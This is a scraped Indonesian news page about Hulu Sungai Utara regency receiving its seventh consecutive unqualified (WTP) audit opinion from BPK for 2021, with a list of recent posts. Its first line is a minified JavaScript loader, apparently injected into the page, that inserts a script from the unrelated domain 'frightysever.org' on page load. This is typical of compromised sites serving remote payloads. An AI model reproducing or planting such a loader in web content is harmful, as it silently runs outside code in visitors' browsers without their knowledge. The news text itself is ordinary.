(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kabupaten Hulu Sungai Utara

HSU Kembali Raih Opini WTP, Plt Bupati Husairi Terus Bina Pengelolaan Keuangan Daerah


KANALKALIMANTAN.COM, BANJARBARU – Pemkab Hulu Sungai Utara (HSU) kembali meraih predikat Wajar Tanpa Pengecualian (WTP) tahun anggaran 2021 atas pemeriksaan Laporan Keuangan Pemerintah Daerah (LKPD) dar Badan Pemeriksa Keuangan (BPK) RI Perwakilan Provinsi Kalimatan Selatan.

Penghargaan Laporan Hasil Pemeriksaan (LHP) BPK RI tahun 2021 ini diserahkan langsung oleh Kepala BPK RI Perwakilan Kalsel kepada Pelaksana Tugas Bupati HSU, di Banjarbaru, Selasa (17/5/2022).

Alhasil berkat penghargaan ini menjadikan Pemkab HSU mendapatkan predikat ke-tujuh kalinya WTP berturut-turut sejak tahun 2015.

Kepala BPK RI Perwakilan Kalsel, M. Ali Asyhar menuturkan pihaknya telah melakukan pemeriksaan atas Laporan Keuangan Pemerintah Daerah (LKPD) tahun 2021 sesuai dengan peraturan perundang-undangan yang berlaku.

 

Baca juga  : Mantan Plt Kalapas Kelas III Batulicin Raih Penghargaan Ketua DPRD Tanbu

Sementara, Plt Bupati HSU, Husairi Abdi mengaku bersyukur dan mengucapkan terima kasih kepada jajaran BPKAD dan semua SKPD yang bekerja sama dalam kelancaran laporan pemeriksaan keuangan Pemerintah Kabupaten Hulu Sungai Utara.

Dirinya juga mengucapkan terima kasih kepada BPK Perwakilan Provinsi Kalimantan Selatan yang telah memberikan bimbingan dan petunjuk kepada Pemkab HSU dalam rangka pengelolaan keuangan yang baik, transparan, akuntabel, dan tepat sasaran.

“Alhamdulillah bersyukur kita kembali meraih WTP pada tahun ini yang ketujuh secara berturut-turut, semoga ini dapat terus kita pertahankan,” kata Husairi.

Lebih jauh, Husairi mengingatkan kepada seluruh pengelola keuangan di masing-masing SKPD di Pemerintahan Kabupaten Hulu Sungai Utara, diharapkan agar bisa melaksanakan tugas sebagaimana mestinya.

Terakhir, dirinya memastikan akan terus melakukan pembinaan pengelolaan keuangan secara intens kepada setiap SKPD. (kanalkalimantan.com/dew)

Reporter : dew
Editor : cell


Desy Arfianty

Recent Posts

Amuntai Expo dan Bazar Ekonomi Kreatif 2024

KANALKALIMANTAN.COM, AMUNTAI - Memeriahkan Hari Jadi ke-72 Kabupaten Hulu Sungai Utara (HSU) digelar Amuntai Expo… Read More

4 jam ago

Warga Muhammadiyah Banjarbaru Berhalalbihalal di Masjid At Taqwa

KANALKALIMANTAN.COM, BANJARBARU - Pimpinan Cabang Muhammadiyah Banjarbaru Utara menggelar halalbihalal sekaligus Hari Bermuhammadiyah kali pertama… Read More

6 jam ago

5 Mei Hari Bidan Sedunia

KANALKALIMANTAN.COM – Negara-negara di dunia merayakan Hari Bidan Sedunia yang jatuh pada 5 Mei setiap… Read More

12 jam ago

Syamsudin Noor Jadi Bandara Domestik, Begini Respon Wali Kota Banjarbaru

KANALKALIMANTAN.COM, BANJARBARU - Pencopotan status internasional pada Bandara Syamsudin Noor Banjarmasin yang terletak di Kota… Read More

13 jam ago

Presiden Jokowi di Booth PLN PEVS 2024, Dirut PLN Paparkan Kesiapan Ekosistem Kendaraan Listrik

KANALKALIMANTAN.COM, JAKARTA - Presiden Republik Indonesia Joko Widodo (Jokowi) mengunjungi booth PT PLN (Persero) dalam… Read More

15 jam ago

Akhir Pekan Pasti Hemat, Berikut Promo BRI hingga 30 Persen di 8 Kota Indonesia

KANALKALIMANTAN.COM – Bagi sebagian orang, akhir pekan (weekend) merupakan waktu yang dinanti. Sembari rehat bekerja,… Read More

19 jam ago

This website uses cookies.